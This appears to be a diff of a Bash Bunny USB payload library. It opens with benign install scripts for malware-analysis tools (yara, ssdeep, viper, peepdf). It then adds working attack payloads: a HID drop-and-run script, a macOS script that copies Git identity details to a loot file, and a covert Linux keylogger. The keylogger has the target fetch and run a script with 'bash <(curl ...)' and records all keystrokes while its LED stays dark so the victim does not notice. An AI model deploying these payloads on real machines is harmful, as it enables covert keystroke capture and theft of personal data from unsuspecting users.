# Title: Malware Bunny
# Description: peepdf install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
apt-get install -y unzip python-libemu
cd /tmp/
wget http://eternal-todo.com/files/pdf/peepdf/peepdf_0.3.zip
unzip peepdf_0.3.zip
mv peepdf_0.3 /tools/peepdf
cd /tools/peepdf
#mkdir dpt
#cd dpt
#wget https://storage.googleapis.com/chrome-infra/depot_tools.zip
#unzip depot_tools.zip
#cd ..
#mv dpt /tools/depot_tools
#echo 'export PATH=$PATH:$HOME/../tools/depot_tools' >> ~/.bashrc
#gclient
#mkdir /tools/v8
#cd /tools/v8
#fetch v8

15
payloads/library/Incident_Response/MalwareBunny/install/punbup.sh Normal file
View File

@ -0,0 +1,15 @@
#!/bin/bash
# Title: Malware Bunny
# Description: punbup install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
cd /tools
git clone https://github.com/herrcore/punbup
cd punbup
python setup.py install

30
payloads/library/Incident_Response/MalwareBunny/install/setup.sh Normal file
View File

@ -0,0 +1,30 @@
#!/bin/bash
# Title: Malware Bunny
# Description: main install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
# Install System Dependencies
apt-get install -y automake libtool make gcc flex bison libmagic-dev libssl-dev python-dev swig libfuzzy-dev exiftool
# Install Python Dependencies
pip install SQLAlchemy PrettyTable python-magic
# Other Tools
apt-get -y install python-scapy pyew unzip
# Setup Custom Tools
./ssdeep.sh
./yara.sh
./viper.sh
./dshell.sh
./capstone.sh
./binwalk.sh
./featherduster.sh
./wabt.sh
./peepdf.sh

23
payloads/library/Incident_Response/MalwareBunny/install/ssdeep.sh Normal file
View File

@ -0,0 +1,23 @@
#!/bin/bash
# Title: Malware Bunny
# Description: ssdeep install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
cd /tmp
wget https://github.com/ssdeep-project/ssdeep/archive/release-2.14.1.tar.gz
tar xf release-2.14.1.tar.gz
rm release-2.14.1.tar.gz
mv ssdeep-release-2.14.1/ /tools/ssdeep
cd /tools/ssdeep
./bootstrap
./configure
make
make install
pip install pydeep

17
payloads/library/Incident_Response/MalwareBunny/install/viper.sh Normal file
View File

@ -0,0 +1,17 @@
#!/bin/bash
# Title: Malware Bunny
# Description: viper install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
cd /tmp
wget https://github.com/viper-framework/viper/archive/v1.2.tar.gz
tar xf v1.2.tar.gz
rm v1.2.tar.gz
mv viper-1.2/ /tools/viper
cd /tools/viper
pip install -r requirements.txt

15
payloads/library/Incident_Response/MalwareBunny/install/wabt.sh Normal file
View File

@ -0,0 +1,15 @@
#!/bin/bash
# Title: Malware Bunny
# Description: web assembly binary toolkit install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
apt-get install cmake clang
cd /tools/
git clone --recursive https://github.com/WebAssembly/wabt
cd wabt
make

23
payloads/library/Incident_Response/MalwareBunny/install/yara.sh Normal file
View File

@ -0,0 +1,23 @@
#!/bin/bash
# Title: Malware Bunny
# Description: yara install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
cd /tmp
wget https://github.com/VirusTotal/yara/archive/v3.7.0.tar.gz
tar xf v3.7.0.tar.gz
rm v3.7.0.tar.gz
mv yara-3.7.0/ /tools/yara
cd /tools/yara
./bootstrap.sh
./configure --enable-magic --enable-dotnet
make
make install
pip install yara-python

24
payloads/library/Incident_Response/MalwareBunny/switch1/payload.txt Normal file
View File

@ -0,0 +1,24 @@
#!/bin/bash
# Title: MalwareBunny
# Description: Malware Analysis on Bash Bunny
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
#
# LED State Descriptions
# Magenta Blinking - setup in progress
# Blue Blinking - ready to use
LED M SLOW
ATTACKMODE RNDIS_ETHERNET
sleep 3
cd /tools/viper/
python web.py -H 0.0.0.0 -p 8080 &
CUCUMBER ENABLE
sleep 3
LED B SLOW

18
payloads/library/Incident_Response/MalwareBunny/switch2/payload.txt Normal file
View File

@ -0,0 +1,18 @@
#!/bin/bash
# Title: MalwareBunny
# Description: Malware Analysis on Bash Bunny
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
#
# LED State Descriptions
# Magenta Blinking - setup in progress
# Blue Blinking - ready to use
LED M SLOW
ATTACKMODE RNDIS_ETHERNET
sleep 5
LED B SLOW

7
payloads/library/execution/drop_n_run/fuse.sh Normal file
View File

@ -0,0 +1,7 @@
#!/bin/bash
# Wake up and do something productive here instead...
sleep 10
# boom!!
firefox "http://hak5.org"

30
payloads/library/execution/drop_n_run/payload.txt Executable file
View File

@ -0,0 +1,30 @@
#!/bin/bash
#
# Title: The Ol'Drop'n'Run
# Author: bg-wa
# Version: 1.0
# Category: HID
# Target: UNITY
# Attackmodes: HID
#
# Quick HID only attack to write a file to target machine and open
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | SETUP | Open vi |
# | ATTACK | Writing files |
# | FINISH | Payload Dropped & ran (remove the bunny) |
#
ATTACKMODE HID
LED SETUP
source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
target_script=\~/fuse.sh
LED ATTACK
DROP $source_script $target_script true true
RUN UNITY $target_script
LED FINISH

30
payloads/library/exfiltration/githubExfiltration/README.md Normal file
View File

@ -0,0 +1,30 @@
<div align="center">
# Github Information Exfiltration
**Get Git user name and email from the Git global config and exfiltrate them**
![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white)
![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white)
![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black)
</div>
<img width="1000" alt="banner" src="https://raw.githubusercontent.com/quentinlamamy/bashbunny/main/img/githubExfiltration.jpg"/>
# Dependency
* OSX Extension by quentin_lamamy
# Changelog
v1.0 :
* :tada: Release on 2023/08/20
# Contributing
A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues)
# License
<p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://github.com/quentinlamamy/bashbunny/blob/main/payloads/githubExfiltration/payload.txt">Github Infos Exfiltration Payload</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://github.com/quentinlamamy">Quentin Lamamy</a> is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-NC-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/nc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg?ref=chooser-v1"></a></p>
# Support
<a href="https://www.buymeacoffee.com/quentinlamamy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>

58
payloads/library/exfiltration/githubExfiltration/payload.txt Executable file
View File

@ -0,0 +1,58 @@
#!/bin/bash
#
# Title: OSX Payload to exfiltrate Git user name and email
# Description: Get Git user name and email from the Git global config and exfiltrate them
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID STORAGE
# Target OS: OSX
# Dependency: OSX Extensions
#
# Magenta solid Setup
# Yellow single blink Attack in progress
# Yellow double blink Sync
# Yellow triple blink Cleanup
# Green blink then solid Finished
LED SETUP
ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250
OSX TERMINAL OPEN
Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)'
Q ENTER
Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt'
Q ENTER
Q STRING 'touch $lootPath'
Q ENTER
LED ATTACK
# Get the user name from the Git global config
Q STRING 'user_name=$(git config --global user.name)'
Q ENTER
# Get the user email from the Git global config
Q STRING 'user_email=$(git config --global user.email)'
Q ENTER
Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath'
Q ENTER
# Sync
LED STAGE 2
sync
# Cleanup
LED STAGE 3
# Eject
QUACK STRING 'diskutil eject $last_mounted_volume'
QUACK ENTER
DELAY 100
OSX TERMINAL CLOSE
LED FINISH

20
payloads/library/recon/KeyLogger/Linux.sh Normal file
View File

@ -0,0 +1,20 @@
#/bin/bash
checkonbunny() {
mybunny=$(lsblk -p -S -o NAME,SERIAL | grep $BunnyID | awk '{print $1}')
mybunny=$(findmnt $mybunny | grep $mybunny | awk '{print $1}')
if [ -d $mybunny ]; then
bashbunnyloot=$mybunny"/loot"
mapfile=$bashbunnyloot"/maps"
keyfile=$bashbunnyloot"/keys"
startwork
fi
}
startwork(){
getdevicetouse=${getdevicetouse#"id="}
xinput --test $getdevicetouse > $keyfile &
xmodmap -pke > $mapfile
}
BunnyID="ch000001"
bashbunnyloot=''
getdevicetouse=$(xinput |grep keyboard | sed 's/slave keyboard//g' | while IFS= read -r line ;do [[ $line != *"Virtual"* ]] && [[ $line == *"keyboard"* ]] && echo $line | awk '{ for (i=1; i<=NF; ++i) { if ($i ~ "id=") print $i} }'; done)
[[ -z $getdevicetouse ]] || checkonbunny

28
payloads/library/recon/KeyLogger/Readme.md Normal file
View File

@ -0,0 +1,28 @@
# Keylogger For Bash Bunny
Author: TheDragonkeeper
Version: Version 1
## Description
Dirty keylogger. Runs a webserver to pull code from for multiOS targeting
Captures all keyboard input without the need for root access
Uses the user keyboard map file for decoding the captured data
## STATUS
| LED | Status |
| ---------------- | ----------------------------------------------------------------------------- |
| Blue flash | Booting |
| Red slow | Waiting on webserver |
| Blue Fast | Identifying Target and deploying accordingly |
| LED OFF | Capturing data, no led for victim to spot, waiting for switch position change |
| LED Red Fast | Decoding keys, Then doing any cleanup required |
| Green flashing | Task complete, ready to unplug |
Still WIP, Currently supports linux (tested on ubuntu)
If you want to add payloads for OSX or Windows place them into the switch folder then,
Change TARGET_OS= to 'auto' and add the payloads to lines 15,16 as well as the clean up to lines 40,41 in payload.txt

43
payloads/library/recon/KeyLogger/payload.txt Normal file
View File

@ -0,0 +1,43 @@
TARGET_OS='LINUX'
LED B 100
ATTACKMODE HID STORAGE ECM_ETHERNET
sleep 3
LED R SLOW
GET HOST_IP
GET SWITCH_POSITION
udisk mount
cd /root/udisk/payloads/$SWITCH_POSITION/
python webserver.py &
while true; do [[ $(curl $HOST_IP:8080/index.html) ]] && break ; done
LED B FAST
[[ $TARGET_OS == 'auto' ]] && GET TARGET_OS
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX bash \-c \'bash \<\(curl http\:\/\/$HOST_IP\:8080\/Linux\.sh\)\' \&
LED
WAIT
LED R 0
cd /root/udisk/loot
keystate=''
_ctrl='0'
_alt='0'
_shift='0'
for line in $(cat 'keys')
do
if [ $line != 'key' ]; then
if [ $line == 'press' ] || [ $line == 'release' ]; then
keystate=$line
else
_spaces=$(printf '%*s' $((4-${#line})) | tr ' ' ' ')
searchparams='keycode'"$_spaces"$line
key=$(cat 'maps' | grep "$searchparams" | awk '{print $4}')
echo "Ctrl="$_ctrl" Alt="$_alt" Shift="$_shift" "$keystate" "$key >> 'decoded'
fi
fi
done
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX killall xinput
LED G 0

28
payloads/library/recon/KeyLogger/webserver.py Normal file
View File

@ -0,0 +1,28 @@
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from os import curdir, sep
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path=="/":
self.path="/"
try:
sendReply = False
if self.path.endswith(".sh"):
mimetype='text/plain'
sendReply = True
if sendReply == True:
f = open(curdir + sep + self.path)
self.send_response(200)
self.send_header('Content-type',mimetype)
self.end_headers()
self.wfile.write(f.read())
f.close()
return
except IOError:
self.send_error(404,'File Not Found: %s' % self.path)
try:
server = HTTPServer(('0.0.0.0', PORT_NUMBER), myHandler)
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()